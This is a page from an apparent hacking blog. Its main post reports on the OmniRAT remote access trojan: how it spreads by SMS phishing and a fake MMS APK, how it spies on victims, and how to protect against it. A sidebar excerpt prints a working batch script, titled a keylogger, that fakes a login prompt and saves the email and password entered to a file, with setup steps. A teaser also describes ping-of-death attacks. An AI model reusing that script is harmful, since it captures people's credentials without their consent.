Skip to main content

Omnirat save us

OmniRAT :– $25 tool to hack into Windows, OS X and Android device

$25 OmniRAT is a “Remote Administration Tool” which can hack into Windows, OS X and Android run devices

OmniRAT is a software that lets you hack into computers running on Windows and Mac OS X in addition to hacking Android smartphones and tablets. OmniRAT can can spy on communications, secretly record conversations, snoop on browsing histories and take complete control of a remote device. And its cheap. OmniRAT is available on the dark web underground forums for $25 compared to another notorious malware, DroidJack which is sold for $210.

Security researcher Nikolaos Chrysaidos from anti-virus maker Avast who discovered the OmniRAT and calls it a Remote Administration tool .  In his blog post Chrysaidos describes how he believes hackers have infected Androids with OmniRAT after sending an SMS. Chrysaidos says that OmniRAT can also be used for legitimate purposes, with the permission and consent of the owners of Android, Mac and Windows computers it tries to control. But in the hands of a cyber criminal it becomes a “Remote Access Trojan” – giving the malicious hackers an opportunity to sneakily spy on and steal from unsuspecting users duped into installing the code.

The OmniRAT spreads through phishing which takes the victim to a website laden with the installation file of OmniRAT. A German Android user explained on the Techboard forum on how he was lured into a website with OmniRAT.  He said that had received an SMS telling him that an MMS had not been delivered directly to him due to the StageFright vulnerability. In order to access the MMS, he was told to follow a bit.ly link within three days, and enter a PIN code.

However, as Crysaidos explains, visiting the URL would initiate the attempt to install OmniRAT onto the target’s Android device:

Once you enter your number and code, an APK, mms-einst8923, is downloaded onto the Android device. The mms-einst8923.apk, once installed, loads a message onto the phone saying that the MMS settings have been successfully modified and loads an icon, labeled “MMS Retrieve” onto the phone.

Once the icon is opened by the victim, mms-einst8923.apk extracts OmniRat, which is encoded within the mms-einst8923.apk. In the example described on Techboard-online, a customized version of OmniRat is extracted.

The APK than demands the Android user to accept a long list of permissions which should trigger suspicions among tech savvy users.

Once installed, the App will send its own SMS message to the victims friends and colleagues listed in the contact list and further spread itself. The OmniRAT cannot be uninstalled once it is installed on the Android smartphones.  Chrysaidos says that even if the victim uninstalls the MMS Retrieve icon, the customised version of OmniRAT remains installed on his/her Android smartphone, and will be sending data to a command and control (C&C) server seemingly based in Russia.

Chrysaidos says that Android users should undertake following steps to protect themselves from OmniRAT.

Make sure you have an antivirus solution installed on your smartphone to detect malware, like OmniRat. Avast detects OmniRat as Android:OmniRat-A [Trj].Do not open any links from untrusted sources. If an unknown number or email address sends you a link, do not open the link.Do not download apps from unknown sources to your mobile device. Only download apps from trusted sources such as the Google Play Store or the Apple App Store

Comments

Post a Comment

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file w...
Post a Comment
Read more

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent f...
Post a Comment
Read more

What is DNS

D NS stands for Domain Name System is used to as the medium to translate domain names to their respective IP addresses when a client initiates a request query. DNS stores the database of all the domain names and their IP addresses which are registered on the network. Most of us are quite familiar with the term DNS or Domain Name System. DNS can be thought of as an attendance register for various websites present over the internet. In the case of DNS, it maintains the database of all the websites Domain Names and their IP (Internet Protocol) addresses that are operational all over the world. Historical Notes The origins of DNS date back to the time of the ARPANET  when there were only a few computers to get an entry in the database. A HOSTS.TXT file was maintained by Stanford Research Institute, which constituted the data of all the machines, and was copied by all the host machines to remain updated. Jon Postel from the Information Sciences Institute requested Pau...
Post a Comment
Read more